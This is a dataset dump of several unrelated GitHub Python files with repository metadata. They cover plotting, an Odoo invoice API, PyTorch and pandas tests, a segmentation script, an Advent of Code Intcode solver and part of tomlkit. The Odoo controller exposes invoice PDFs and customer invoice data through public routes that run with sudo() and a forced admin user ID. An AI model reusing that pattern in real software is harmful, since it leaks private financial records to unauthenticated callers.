addsubgraph(figshape, (0,0),t,a1,a2,'accuracy')\n addsubgraph(figshape, (1,0),t,e1,e2,'error')\n addsubgraph(figshape, (0,1),t[len(t)//2:],a1[len(t)//2:],a2[len(t)//2:],'accuracy')\n addsubgraph(figshape, (1,1),t[len(t)//2:],e1[len(t)//2:],e2[len(t)//2:],'error')\n \n if tr_H is not None:\n display_clusters(tr_H, tr_Y, te_H, te_Y, figshape, epoch)\n \n if waitForGraph:\n plt.show()\n else: \n plt.draw()\n if not os.path.isdir(dirname + 'tmp'):\n os.mkdir(dirname + 'tmp')\n \n plt.savefig(f\"{dirname}tmp/epoch_{epoch:04d}.png\")\n plt.pause(0.01)\n\ndef plotProbs(H, Y, minval, maxval):\n dif = []\n\n numclusters = 300\n counts_cor =[0 for _ in range(numclusters)]\n counts_inc =[0 for _ in range(numclusters)]\n for i in range(H.shape[0]):\n for j in range(H.shape[1]):\n num = int((H[i,j] - minval) * (numclusters + 0.0) / (maxval-minval))\n if Y[i] == j:\n counts_cor[num] += 1.0\n else:\n counts_inc[num] += 1.0 / (H.shape[1] - 1.0)\n dif.append(H[i,Y[i]] - H[i,j])\n \n plt.plot([minval + (i + 0.0) *(maxval-minval) / (numclusters + 0.0) for i in range(numclusters)], counts_cor, 'b')\n plt.plot([minval + (i + 0.0) *(maxval-minval) / (numclusters + 0.0) for i in range(numclusters)], counts_inc, 'r')\n \n minval2 = min(dif)\n maxval2 = max(dif)\n maxval2 += 0.001 * (maxval2-minval2)\n\n counts_dif =[0 for _ in range(numclusters)]\n for i in range(len(dif)):\n num = int((dif[i] - minval2) * (numclusters + 0.0) / (maxval2-minval2))\n counts_dif[num] += 1.0 / (H.shape[1] - 1.0)\n \n plt.plot([minval2 + (i + 0.0) *(maxval2-minval2) / (numclusters + 0.0) for i in range(numclusters)], counts_dif, 'g')\n\ndef display_clusters(H,Y,H_t,Y_t, figshape, epoch):\n colors = ['b','g','r','c','m','y','indigo','lime','aqua','peru']\n\n minval = min(H.min(),H_t.min())\n maxval = max(H.max(),H_t.max())\n \n maxval += 0.001 * (maxval-minval)\n\n plt.subplot2grid(figshape,(0,3))\n plotProbs(H, Y, minval, maxval)\n plt.subplot2grid(figshape,(1,3))\n plotProbs(H_t, Y_t, minval, maxval)\n\n H = np.concatenate((H,np.ones((H.shape[0],1))),axis=1)\n H_t = np.concatenate((H_t,np.ones((H_t.shape[0],1))),axis=1)\n \n Yc = []\n for i in range(len(Y)):\n Yc.append(colors[Y[i]])\n\n Yc_t = []\n for i in range(len(Y_t)):\n Yc_t.append(colors[Y_t[i]])\n\n \n Ht = np.transpose(H)\n HtH = np.matmul(Ht,H)\n iHtH = np.linalg.inv(HtH)\n iHtHHt = np.matmul(iHtH,Ht)\n\n maxcor = 0\n trans = [i for i in range(10)]\n\n YY = []\n for i in range(len(Y)):\n w = trans[Y[i]]\n tmp = [m.cos(w * 2.0 * m.pi / 10.0),m.sin(w * 2.0 * m.pi / 10.0)]\n YY.append(tmp)\n\n YY = np.array(YY)\n x = np.matmul(iHtHHt,YY)\n\n Ys = np.matmul(H,x)\n plt.subplot2grid(figshape,(0,2))\n plt.scatter(Ys[:,0], Ys[:,1], s=0.2, c=Yc, alpha=0.3)\n \n Ys_t = np.matmul(H_t,x)\n plt.subplot2grid(figshape,(1,2))\n plt.scatter(Ys_t[:,0], Ys_t[:,1], s=0.2, c=Yc_t, alpha=0.3)\n\nif __name__ == \"__main__\":\n filename = 'debug.txt'\n \n e1=[]\n a1=[]\n e2=[]\n a2=[]\n with open(filename, 'rt') as f:\n while True:\n content = f.readline()\n if len(content) == 0:\n break\n field = content.replace('\\n','').split(',')\n\n if len(field)!=5:\n break\n\n e1.append(float(field[1]))\n a1.append(float(field[2]))\n e2.append(float(field[3]))\n a2.append(float(field[4]))\n\n print('Max train accuracy:', max(a1))\n print('Max test accuracy:', max(a2))\n print('Min train J:', min(e1))\n print('Min test J:', min(e2))\n\n display_results(a1,a2,e1,e2, True)\n","repo_name":"Axboexx/mf2android","sub_path":"utils/disp_results.py","file_name":"disp_results.py","file_ext":"py","file_size_in_byte":4602,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"26052723296","text":"# -*- coding: utf-8 -*-\nimport logging\nimport json\n\nfrom pprint import pprint\nfrom odoo import http\nfrom odoo.http import request\nfrom odoo.osv import expression\nfrom odoo import fields\nfrom dateutil.relativedelta import relativedelta\n\n_logger = logging.getLogger(__name__)\n\n\nclass AppAccountMove(http.Controller):\n\n FIELDNAMES = ['id', 'name', 'partner_id', 'invoice_date', 'invoice_date_due', 'invoice_origin', 'amount_untaxed',\n 'amount_by_group', 'amount_total', 'amount_residual', 'reception_date_client', 'state',\n 'payment_state', 'sent_to_admin']\n FIELDFILTERS = ['id', 'partner_id', 'state']\n\n @http.route(['/app/account_move//print'], type='http', methods=['GET'], auth=\"public\",\n website=False,\n sitemap=False)\n def print_account_move(self, account_move_id, **kwargs):\n try:\n account_move = request.env['account.move'].sudo().search([('id', '=', int(account_move_id))])\n except Exception as e:\n return json.dumps({'status': 400, 'msg': str(e)})\n if account_move:\n request.uid = int(2)\n pdf, _ = request.env.ref('maxcam_account.invoice_free_form_1_id').sudo()._render_qweb_pdf([account_move.id])\n pdfhttpheaders = [('Content-Type', 'application/pdf'), ('Content-Length', u'%s' % len(pdf))]\n return request.make_response(pdf, headers=pdfhttpheaders)\n\n @http.route('/app/account_move', type='http', methods=['GET'], auth='public', website=False, sitemap=False)\n def app_account_move_movil(self, seller_id, limit=0, offset=0, partner_name=None, **kwargs):\n\n data = {'status': 200, 'msg': 'Success'}\n domain_partner = expression.AND([[('seller_id', '=', int(seller_id))]])\n \n if partner_name:\n domain_partner_name = self._get_search_domain(partner_name)\n domain_partner = expression.AND([domain_partner, domain_partner_name])\n partner = request.env['res.partner'].sudo().search(domain_partner).ids\n\n domain = expression.AND([[('seller_id', '=', int(seller_id)), ('partner_id', 'in', partner),\n ('payment_state', '!=', 'paid'), ('move_type', 'in', ['out_invoice', 'out_refund']),\n ('state', '=', 'posted')]])\n today = fields.date.today()\n expired_date = fields.Date.from_string(today) - relativedelta(days=90)\n domain_paid = expression.AND([[('seller_id', '=', int(seller_id)), ('partner_id', 'in', partner),\n ('payment_state', '=', 'paid'), ('state', '=', 'posted'),\n ('last_payment_date', '>', expired_date),\n ('move_type', 'in', ['out_invoice', 'out_refund'])]])\n for key in kwargs:\n if key in self.FIELDFILTERS:\n value = kwargs.get(key)\n domain = expression.AND([domain, [(key, '=', int(value))]])\n\n # Search Read\n account_move_ids = request.env['account.move'].sudo().search_read(domain=domain, fields=self.FIELDNAMES,\n limit=int(limit), offset=int(offset),\n order='create_date desc')\n account_move_ids_paid = request.env['account.move'].sudo().search_read(domain=domain_paid,\n fields=self.FIELDNAMES, limit=int(limit),\n offset=int(offset),\n order='create_date desc')\n\n all_acc_move_count = request.env['account.move'].sudo().search_read(domain=domain, fields=self.FIELDNAMES,\n limit=0, offset=0, order='create_date desc')\n account_move_ids = account_move_ids + account_move_ids_paid\n self.convert_field_string(account_move_ids)\n acc_move_count = len(account_move_ids) + len(account_move_ids_paid)\n all_acc_move_count = len(all_acc_move_count)\n if acc_move_count > 0:\n data.update({'data': account_move_ids, 'count': acc_move_count, 'total_count': all_acc_move_count})\n\n else:\n data.update({'status': 204, 'msg': 'Factura no encontrada', 'count': 0, 'data': False})\n\n return json.dumps(data)\n\n @staticmethod\n def convert_field_string(account_move):\n for record in account_move:\n record.update({'invoice_date': str(record.get('invoice_date', False)),\n 'invoice_date_due': str(record.get('invoice_date_due', False)),\n 'reception_date_client': str(record.get('reception_date_client', False))})\n\n @staticmethod\n def _get_search_domain(search):\n domain = []\n if search:\n for srch in search.split(\" \"):\n domain.append([('name', 'ilike', srch)])\n\n return expression.OR(domain)\n","repo_name":"ysabelgodoydelgado/test-paquetes","sub_path":"modules/maxcam_movil/controllers/account_move.py","file_name":"account_move.py","file_ext":"py","file_size_in_byte":5166,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"39315999631","text":"from itertools import combinations\nfrom typing import Callable, Iterable, Union\n\nfrom hypothesis import assume, given, strategies as st\nfrom more_itertools import always_iterable\nfrom phytorch.extensions.elliptic import elliprj\nfrom pytest import mark\nfrom torch import Tensor, tensor\nfrom torch.autograd import gradcheck, gradgradcheck\n\nfrom phytorch.special.elliptic import *\nfrom phytorch.utils.complex import get_default_complex_dtype\nfrom tests.common.dtypes import with_default_double\nfrom tests.common.strategies.numbers import _cut_plane_, _positive_complex_\nfrom tests.special.test_ellipr import ELLIPR_FUNCMAP\n\n\ndef cgtensors(args, **kwargs):\n return tuple(\n tensor(arg, dtype=get_default_complex_dtype(), requires_grad=True, **kwargs)\n if arg is not None else None\n for arg in always_iterable(args)\n )\n\n\n@with_default_double\n@mark.parametrize('func, args', (\n (ellipk, 0.4), (ellipe, 0.4), (ellipd, 0.4), (ellippi, (0.7, 0.4)),\n (ellipkinc, (1.1, 0.4)), (ellipkinc, (None, 0.4, 2.5)),\n (ellipeinc, (1.1, 0.4)), (ellipeinc, (None, 0.4, 2.5)),\n (ellipdinc, (1.1, 0.4)), (ellipdinc, (None, 0.4, 2.5)),\n (ellippiinc, (0.7, 1.1, 0.4)), (ellippiinc, (0.7, None, 1.1, 2.5)),\n (elliprc, (1, 2)),\n (elliprd, (1, 2, 3)), (elliprf, (1, 2, 3)),\n (elliprg, (1, 2, 3)), (elliprj, (1, 2, 3, 4))\n))\ndef test_grads_work_at_all(func: Callable, args: Union[Tensor, Iterable[Tensor]]):\n args = cgtensors(args)\n assert gradcheck(func, args)\n assert gradgradcheck(func, args)\n\n\n@with_default_double\n@mark.parametrize('func, _, nargs', ELLIPR_FUNCMAP[:-1])\n@given(*3*(_cut_plane_(st.floats(1e-2, 1e2)),))\ndef test_ellipr_grads(func, nargs, _, x, y, z):\n args = (x, y, z)[:nargs]\n for _1, _2 in combinations(args, 2):\n assume(abs(_1-_2) > 1e-2)\n\n args = (*tensor(args, dtype=get_default_complex_dtype(), requires_grad=True),)\n assert gradcheck(func, args, raise_exception=False)\n assert gradgradcheck(func, args, raise_exception=False)\n\n\n@with_default_double\n@given(*4*(_positive_complex_(st.floats(1e-2, 1e2)),))\ndef test_elliprj_grad(x, y, z, p):\n args = x, y, z, p\n\n for _1, _2 in combinations(args, 2):\n assume(abs(_1-_2) > 1e-2)\n args = (*tensor(args, dtype=get_default_complex_dtype(), requires_grad=True),)\n\n assert gradcheck(elliprj, args, raise_exception=False)\n assert gradgradcheck(elliprj, args, raise_exception=False)\n","repo_name":"kosiokarchev/phytorch","sub_path":"tests/special/test_elliptic_grads.py","file_name":"test_elliptic_grads.py","file_ext":"py","file_size_in_byte":2422,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"34"} +{"seq_id":"9732235056","text":"from os import name\nimport sys\nimport json\nimport utils\nimport analyzerFun as anl\nimport statistics as sts\n\n# Read out exit filename param if provided\nexit_files = None\nif len(sys.argv) >= 2:\n exit_files = sys.argv[1:]\n\n# Read params from config.json\nwith open(\"config.json\") as file:\n config = json.load(file)\n\ndynamic_filename = utils.read_config_param(\n config, \"dynamic_file\", lambda el : el, lambda el : True)\nexit_filename = utils.read_config_param(\n config, \"exit_file\", lambda el : el, lambda el : True)\nplot_boolean = utils.read_config_param(\n config, \"plot\", lambda el : bool(el), lambda el : True)\n\nN = utils.read_config_param(\n config, \"N\", lambda el : float(el), lambda el : el > 0)\nL = utils.read_config_param(\n config, \"L\", lambda el : float(el), lambda el : el > 0)\nd = utils.read_config_param(\n config, \"d\", lambda el : float(el), lambda el : el > 0)\n\n# Constant values\nW = 10\nLEFT_PERC_STAT_Q = 0.15\nRIGHT_PERC_STAT_Q = 0.85\n\n# Perform multiple plotting and analysis\nx_superlist, y_superlist, legend_list = [], [], []\nn_dict, t_dict = {}, {}\nr_dict = {}\nn_to_d = {200:1.2, 260:1.8, 320:2.4, 380:3.0}\n# ={1.2, 1.8, 2.4, 3.0}m y N = {200, 260, 320, 380}\nfor filename in exit_files:\n # Expected filename format: exit-N-i.txt\n name_data = filename[:-4].split('-') # Take filename without .txt extension\n n = int(name_data[1])\n \n metric = anl.analyze_dload(filename, n, L, False)\n x_superlist.append(metric.time_list)\n y_superlist.append(metric.n_list)\n legend_list.append(name_data)\n \n if n not in n_dict:\n n_dict[n] = []\n t_dict[n] = []\n n_dict[n].append(metric.n_list)\n t_dict[n].append(metric.time_list)\n\n dynamic_filename = filename.replace('exit', 'dynamic')\n rad_med = anl.get_radius_array(dynamic_filename, int(LEFT_PERC_STAT_Q * n) - W, int(RIGHT_PERC_STAT_Q * n))\n if n not in r_dict:\n r_dict[n] = []\n r_dict[n].append(rad_med)\n\nq_mean, q_dev = [], []\nr_med = []\nq_superlist, n_superlist, time_superlist, d_list = [], [], [], []\n\nfor key in n_dict.keys():\n avg_x, avg_y, err_x, q_list = anl.analyze_avg(t_dict[key], n_dict[key], n_to_d[key], W, plot_boolean)\n q_mean.append(sts.mean(q_list[int(LEFT_PERC_STAT_Q * key):int(RIGHT_PERC_STAT_Q * key)]))\n q_dev.append(sts.stdev(q_list[int(LEFT_PERC_STAT_Q * key):int(RIGHT_PERC_STAT_Q * key)]))\n r_med.append(sts.mean(r_dict[key]))\n d_list.append(n_to_d[key])\n q_superlist.append(q_list)\n time_superlist.append(avg_x[W:])\n n_superlist.append(avg_y[W:])\n\n# x_superlist.append(avg_x)\n# y_superlist.append(avg_y)\n# legend_list.append(\"promedio\")\n\nif plot_boolean:\n # Initialize plotting\n utils.init_plotter()\n\n # Plot outgoing particles f(n) + avg\n utils.plot_multiple_values(\n n_superlist,\n 'particulas salientes',\n q_superlist,\n 'caudal (1/s)',\n legend_list,\n sci_y=False\n )\n\n # Plot outgoing particles f(t) + avg\n utils.plot_multiple_values(\n time_superlist,\n 'tiempo (s)',\n q_superlist,\n 'caudal (1/s)',\n legend_list,\n sci_y=False\n )\n\n utils.plot_error_bars(\n d_list,\n 'd (m)',\n q_mean, \n 'caudal (1/s)',\n q_dev, \n sci_y= False\n )\n\n utils.plot_values_with_adjust(\n d_list,\n 'd (m)',\n q_mean,\n 'caudal (1/s)',\n r_med,\n sci=False\n )\n\n utils.plot_values_with_adjust_and_err(\n d_list,\n 'd (m)',\n q_mean,\n 'caudal (1/s)',\n q_dev,\n r_med,\n sci=False\n )\n\n # Hold execution\n utils.hold_execution() \n\n\n # parsear el dynamic , tomar los radios y promediarlos entre el primer t y el ultimo","repo_name":"jtallar/pedestrian-dynamic","sub_path":"analyzerMult.py","file_name":"analyzerMult.py","file_ext":"py","file_size_in_byte":3733,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"20492286251","text":"import pandas as pd\nimport pytest\n# src\nfrom src.data.make_preprocessing import clean_categoric_columns, clean_numeric_columns, drop_gargbage_columns, drop_nan, drop_outliers, drop_unuseful_columns, set_nan_for_numeric_outliers\n\n\n@pytest.fixture\ndef data():\n data_test = pd.read_csv('data/raw/cervezaDS.csv')\n return data_test\n\n\ndef test_set_nan_for_numeric_outliers(data):\n # Given\n data_scenario = drop_gargbage_columns(data)\n data_scenario = clean_numeric_columns(data)\n description_before = data_scenario['Efficiency'].describe()\n # When\n set_nan_for_numeric_outliers('Efficiency', data_scenario)\n description_after = data_scenario['Efficiency'].describe()\n\n # Then\n assert description_before[7] is not description_after[7]\n assert description_before[3] is not description_after[3]\n\n\ndef test_drop_nan(data):\n # Given\n len_before = len(data)\n # When\n data_scenario = drop_nan(data)\n len_after = len(data_scenario)\n\n # Then\n assert len_before is not len_after\n\n\ndef test_drop_outliers(data):\n # Given\n data_scenario = drop_gargbage_columns(data)\n data_scenario = drop_unuseful_columns(data_scenario)\n data_scenario = clean_numeric_columns(data_scenario)\n data_scenario = clean_categoric_columns(data_scenario)\n # When\n result = drop_outliers(data_scenario)\n # Then\n assert len(data_scenario) > len(result)\n\n\ndef test_clean_categoric_columns(data):\n # Given\n style_unique_categories_before = len(data['Style'].unique())\n brew_method_categories_before = len(data['BrewMethod'].unique())\n sugar_scale_categories_before = len(data['SugarScale'].unique())\n\n # When\n data_scenario = clean_categoric_columns(data)\n\n # Then\n assert style_unique_categories_before != len(\n data_scenario['Style'].unique())\n assert brew_method_categories_before != len(\n data_scenario['BrewMethod'].unique())\n assert sugar_scale_categories_before != len(\n data_scenario['SugarScale'].unique())\n\n\ndef test_clean_numeric_columns(data):\n\n # Given\n efficiency_dirty_length = len(data['Efficiency'])\n boil_gravity_dirty_length = len(data['BoilGravity'])\n fg_dirty_length = len(data['FG'])\n primary_temp_dirty_length = len(data['PrimaryTemp'])\n color_dirty_length = len(data['Color'])\n ibu_dirty_length = len(data['IBU'])\n abv_dirty_length = len(data['ABV'])\n boil_time_dirty_length = len(data['BoilTime'])\n\n data_scenario = drop_gargbage_columns(data)\n # When\n data_scenario = clean_numeric_columns(data)\n # Then\n assert data_scenario['Efficiency'].dtype == 'float'\n assert data_scenario['BoilGravity'].dtype == 'float'\n assert data_scenario['FG'].dtype == 'float'\n assert data_scenario['PrimaryTemp'].dtype == 'float'\n assert data_scenario['Color'].dtype == 'float'\n assert data_scenario['IBU'].dtype == 'float'\n assert data_scenario['ABV'].dtype == 'float'\n assert data_scenario['BoilTime'].dtype == 'float'\n\n assert efficiency_dirty_length > len(data_scenario['Efficiency'])\n assert boil_gravity_dirty_length > len(data_scenario['BoilGravity'].dtype)\n assert fg_dirty_length > len(data_scenario['FG'].dtype)\n assert primary_temp_dirty_length > len(data_scenario['PrimaryTemp'].dtype)\n assert color_dirty_length > len(data_scenario['Color'].dtype)\n assert ibu_dirty_length > len(data_scenario['IBU'].dtype)\n assert abv_dirty_length > len(data_scenario['ABV'].dtype)\n assert boil_gravity_dirty_length > len(data_scenario['BoilTime'].dtype)\n\n\ndef test_drop_unuseful_columns(data):\n # Given\n unuse_columns = {'PitchRate', 'MashThickness', 'BeerID', 'StyleID',\n 'Name', 'PrimingAmount', 'PrimingMethod', 'UserId', 'Size(L)'}\n\n # When\n data_scenario = drop_unuseful_columns(data)\n data_scenario_columns = set(data_scenario.columns.values)\n # Then\n assert data_scenario_columns - unuse_columns == data_scenario_columns\n\n\ndef test_drop_garbage_columns(data):\n # Given\n garbage_columns = {'BoilSize', 'ugtft', 'index',\n 'nhbhgv', 'Unnamed: 22', 'Unnamed: 23', 'Unnamed: 0'}\n # When\n data_scenario = drop_gargbage_columns(data)\n data_scenario_columns = set(data_scenario.columns.values)\n # Then\n assert data_scenario_columns - garbage_columns == data_scenario_columns\n","repo_name":"SoftwareGHUq/analytical-processing-final-project","sub_path":"test/make_preprocessing_test.py","file_name":"make_preprocessing_test.py","file_ext":"py","file_size_in_byte":4338,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"41610768779","text":"import torch\nimport numpy as np\nimport cv2\nimport argparse\nimport config\nimport albumentations\n\nfrom PIL import Image\nfrom model import model\nfrom utils.helpers import draw_test_segmentation_map, image_overlay\n\n# construct the argument parser\nparser = argparse.ArgumentParser()\nparser.add_argument('-m', '--model-path', dest='model_path', required=True,\n help='path to the trained model weights')\nparser.add_argument('-i', '--input', required=True, \n help='path to input image')\nargs = vars(parser.parse_args())\n\n# define the image transforms\ntransform = albumentations.Compose([\n albumentations.Normalize(\n mean=[0.45734706, 0.43338275, 0.40058118],\n std=[0.23965294, 0.23532275, 0.2398498],\n always_apply=True)\n])\n\n# initialize the model\nmodel = model\n# load the model checkpoint\ncheckpoint = torch.load(args['model_path'])\n# load the trained weights\nmodel.load_state_dict(checkpoint['model_state_dict'])\n# load the model on to the computation device\nmodel.eval().to(config.DEVICE)\n\nimage = np.array(Image.open(args['input']).convert('RGB'))\n# make a copy of the image\norig_image = image.copy()\n# apply transforms\nimage = transform(image=image)['image']\n# tranpose dimensions\nimage = np.transpose(image, (2, 0, 1))\n# convert to torch tensors\nimage = torch.tensor(image, dtype=torch.float)\n# add batch dimension\nimage = image.unsqueeze(0).to(config.DEVICE)\n\n# forward pass through the model\noutputs = model(image)\noutputs = outputs['out']\n# get the segmentation map\nsegmented_image = draw_test_segmentation_map(outputs)\n# image overlay\nresult = image_overlay(orig_image, segmented_image)\n\n# visualize result\ncv2.imshow('Result', result)\ncv2.waitKey(0)\nsave_name = f\"{args['input'].split('/')[-1].split('.')[0]}\"\ncv2.imwrite(f\"outputs/{save_name}.jpg\", result)","repo_name":"sovit-123/CamVid-Image-Segmentation-using-FCN-ResNet50-with-PyTorch","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1834,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"34"} +{"seq_id":"12778122145","text":"# ======================================================================\r\n# Sunny with a Chance of Asteroids\r\n# Advent of Code 2019 Day 05 -- Eric Wastl -- https://adventofcode.com\r\n#\r\n# Computer simulation by Dr. Dean Earl Wright III\r\n# ======================================================================\r\n\r\n# ======================================================================\r\n# a o c _ c a . p y\r\n# ======================================================================\r\n\"Solve the Chance of Asteroids problem for Advent of Code 2019 day 02\"\r\n\r\n# ----------------------------------------------------------------------\r\n# import\r\n# ----------------------------------------------------------------------\r\nimport argparse\r\nimport sys\r\nimport intcode\r\n\r\n# ----------------------------------------------------------------------\r\n# constants\r\n# ----------------------------------------------------------------------\r\n\r\n# ----------------------------------------------------------------------\r\n# parse_commnd_line\r\n# ----------------------------------------------------------------------\r\n\r\n\r\ndef parse_command_line():\r\n \"Parse the command line options\"\r\n\r\n # 1. Create the command line parser\r\n desc = 'Chance of Asteroids - day 05 of Advent of Code 2019'\r\n sample = 'sample: python aoc_ca.py input.txt'\r\n parser = argparse.ArgumentParser(description=desc,\r\n epilog=sample)\r\n parser.add_argument('-v', '--verbose', action='store_true', default=False,\r\n dest='verbose', help='Print status messages to stdout')\r\n parser.add_argument('-p', '--part', action='store', default=1, type=int,\r\n dest='part', help='Puzzle Part (1 or 2)')\r\n parser.add_argument('-t', '--max-time', action='store', default=0, type=int,\r\n dest='maxtime', help='Maximum timer ticks before quitting')\r\n parser.add_argument('filepath', metavar='FILENAME', action='store', type=str,\r\n help=\"Location of puzzle input\")\r\n\r\n # 2. Get the options and arguments\r\n return parser.parse_args()\r\n\r\n# ----------------------------------------------------------------------\r\n# part_one\r\n# ----------------------------------------------------------------------\r\n\r\ndef part_one(args, input_lines):\r\n \"Process part one of the puzzle\"\r\n\r\n # 1. Optionally select fixup\r\n noun = None\r\n verb = None\r\n inp = [1]\r\n\r\n # 3. Create the computer with fixes\r\n computer = intcode.IntCode(text=input_lines[0], noun=noun, verb=verb, inp=inp)\r\n if args.verbose:\r\n print(\"The computer has %d positions\" % len(computer.positions))\r\n print(computer.instructions())\r\n\r\n # 3. Run the computer until it stops\r\n solution = computer.run(max_steps=args.maxtime, watch=args.verbose)\r\n\r\n # 4. Check it ran out of time\r\n if solution is None:\r\n print(\"No solution found after %d steps\" % args.maxtime)\r\n\r\n # 5. Check it stopped with an error\r\n elif solution != intcode.STOP_HLT:\r\n print(\"Computer alarm %d\" % solution)\r\n solution = None\r\n\r\n # 6. The solution is the last output\r\n else:\r\n output = computer.outputs()\r\n if len(output) == 0:\r\n print(\"There is no output, so no solution\")\r\n solution = None\r\n else:\r\n solution = output.pop()\r\n if len(output) > 0 and not all(x == 0 for x in output):\r\n print(\"final output is %d but other output not all zero %s\" %\r\n (solution, str(output)))\r\n solution = None\r\n else:\r\n print(\"The solution is %d\" % (solution))\r\n\r\n # 7. Return result\r\n return solution is not None\r\n\r\n# ----------------------------------------------------------------------\r\n# part_two\r\n# ----------------------------------------------------------------------\r\n\r\n\r\ndef part_two(args, input_lines):\r\n \"Process part two of the puzzle\"\r\n\r\n # 1. Optionally select fixup\r\n noun = None\r\n verb = None\r\n inp = [5]\r\n\r\n # 3. Create the computer with fixes\r\n computer = intcode.IntCode(text=input_lines[0], noun=noun, verb=verb, inp=inp)\r\n if args.verbose:\r\n print(\"The computer has %d positions\" % len(computer.positions))\r\n print(computer.instructions())\r\n\r\n # 3. Run the computer until it stops\r\n solution = computer.run(max_steps=args.maxtime, watch=args.verbose)\r\n\r\n # 4. Check it ran out of time\r\n if solution is None:\r\n print(\"No solution found after %d steps\" % args.maxtime)\r\n\r\n # 5. Check it stopped with an error\r\n elif solution != intcode.STOP_HLT:\r\n print(\"Computer alarm %d\" % solution)\r\n solution = None\r\n\r\n # 6. The solution is the last output\r\n else:\r\n output = computer.outputs()\r\n if len(output) == 0:\r\n print(\"There is no output, so no solution\")\r\n solution = None\r\n else:\r\n solution = output.pop()\r\n if len(output) > 0 and not all(x == 0 for x in output):\r\n print(\"final output is %d but other output not all zero %s\" %\r\n (solution, str(output)))\r\n solution = None\r\n else:\r\n print(\"The solution is %d\" % (solution))\r\n\r\n # 7. Return result\r\n return solution is not None\r\n\r\n# ----------------------------------------------------------------------\r\n# from_file\r\n# ----------------------------------------------------------------------\r\n\r\n\r\ndef from_file(filepath):\r\n \"Read the file\"\r\n\r\n return from_text(open(filepath).read())\r\n\r\n# ----------------------------------------------------------------------\r\n# from_text\r\n# ----------------------------------------------------------------------\r\n\r\n\r\ndef from_text(text):\r\n \"Break the text into trimed, non-comment lines\"\r\n\r\n # 1. We start with no lines\r\n lines = []\r\n\r\n # 2. Loop for lines in the text\r\n for line in text.split('\\n'):\r\n\r\n # 3. But ignore blank and non-claim lines\r\n line = line.rstrip(' \\r')\r\n if not line:\r\n continue\r\n if line.startswith('#'):\r\n continue\r\n\r\n # 4. Add the line\r\n lines.append(line)\r\n\r\n # 5. Return a list of clean lines\r\n return lines\r\n\r\n# ----------------------------------------------------------------------\r\n# main\r\n# ----------------------------------------------------------------------\r\n\r\n\r\ndef main():\r\n \"\"\"Read Program Alarm and solve it\"\"\"\r\n\r\n # 1. Get the command line options\r\n args = parse_command_line()\r\n\r\n # 2. Read the puzzle file\r\n input_text = from_file(args.filepath)\r\n\r\n # 3. Process the appropiate part of the puzzle\r\n if args.part == 1:\r\n result = part_one(args, input_text)\r\n else:\r\n result = part_two(args, input_text)\r\n\r\n # 5. Set return code (0 if solution found, 2 if not)\r\n if result:\r\n sys.exit(0)\r\n sys.exit(2)\r\n\r\n\r\n# ----------------------------------------------------------------------\r\n# module initialization\r\n# ----------------------------------------------------------------------\r\nif __name__ == '__main__':\r\n main()\r\n\r\n# ======================================================================\r\n# end a o c _ c a . p y end\r\n# ======================================================================\r\n","repo_name":"deanearlwright/AdventOfCode","sub_path":"2019/05_ChanceAsteroids/aoc_ca.py","file_name":"aoc_ca.py","file_ext":"py","file_size_in_byte":7942,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"34"} +{"seq_id":"35849329511","text":"from __future__ import annotations\n\nimport abc\nimport copy\nimport dataclasses\nimport math\nimport re\nimport string\nimport sys\n\nfrom datetime import date\nfrom datetime import datetime\nfrom datetime import time\nfrom datetime import tzinfo\nfrom enum import Enum\nfrom typing import TYPE_CHECKING\nfrom typing import Any\nfrom typing import Callable\nfrom typing import Collection\nfrom typing import Iterable\nfrom typing import Iterator\nfrom typing import Sequence\nfrom typing import TypeVar\nfrom typing import cast\nfrom typing import overload\n\nfrom pipenv.vendor.tomlkit._compat import PY38\nfrom pipenv.vendor.tomlkit._compat import decode\nfrom pipenv.vendor.tomlkit._types import _CustomDict\nfrom pipenv.vendor.tomlkit._types import _CustomFloat\nfrom pipenv.vendor.tomlkit._types import _CustomInt\nfrom pipenv.vendor.tomlkit._types import _CustomList\nfrom pipenv.vendor.tomlkit._types import wrap_method\nfrom pipenv.vendor.tomlkit._utils import CONTROL_CHARS\nfrom pipenv.vendor.tomlkit._utils import escape_string\nfrom pipenv.vendor.tomlkit.exceptions import InvalidStringError\n\n\nif TYPE_CHECKING:\n from pipenv.vendor.tomlkit import container\n\n\nItemT = TypeVar(\"ItemT\", bound=\"Item\")\nEncoder = Callable[[Any], \"Item\"]\nCUSTOM_ENCODERS: list[Encoder] = []\nAT = TypeVar(\"AT\", bound=\"AbstractTable\")\n\n\nclass _ConvertError(TypeError, ValueError):\n \"\"\"An internal error raised when item() fails to convert a value.\n It should be a TypeError, but due to historical reasons\n it needs to subclass ValueError as well.\n \"\"\"\n\n\n@overload\ndef item(value: bool, _parent: Item | None = ..., _sort_keys: bool = ...) -> Bool:\n ...\n\n\n@overload\ndef item(value: int, _parent: Item | None = ..., _sort_keys: bool = ...) -> Integer:\n ...\n\n\n@overload\ndef item(value: float, _parent: Item | None = ..., _sort_keys: bool = ...) -> Float:\n ...\n\n\n@overload\ndef item(value: str, _parent: Item | None = ..., _sort_keys: bool = ...) -> String:\n ...\n\n\n@overload\ndef item(\n value: datetime, _parent: Item | None = ..., _sort_keys: bool = ...\n) -> DateTime:\n ...\n\n\n@overload\ndef item(value: date, _parent: Item | None = ..., _sort_keys: bool = ...) -> Date:\n ...\n\n\n@overload\ndef item(value: time, _parent: Item | None = ..., _sort_keys: bool = ...) -> Time:\n ...\n\n\n@overload\ndef item(\n value: Sequence[dict], _parent: Item | None = ..., _sort_keys: bool = ...\n) -> AoT:\n ...\n\n\n@overload\ndef item(value: Sequence, _parent: Item | None = ..., _sort_keys: bool = ...) -> Array:\n ...\n\n\n@overload\ndef item(value: dict, _parent: Array = ..., _sort_keys: bool = ...) -> InlineTable:\n ...\n\n\n@overload\ndef item(value: dict, _parent: Item | None = ..., _sort_keys: bool = ...) -> Table:\n ...\n\n\n@overload\ndef item(value: ItemT, _parent: Item | None = ..., _sort_keys: bool = ...) -> ItemT:\n ...\n\n\ndef item(value: Any, _parent: Item | 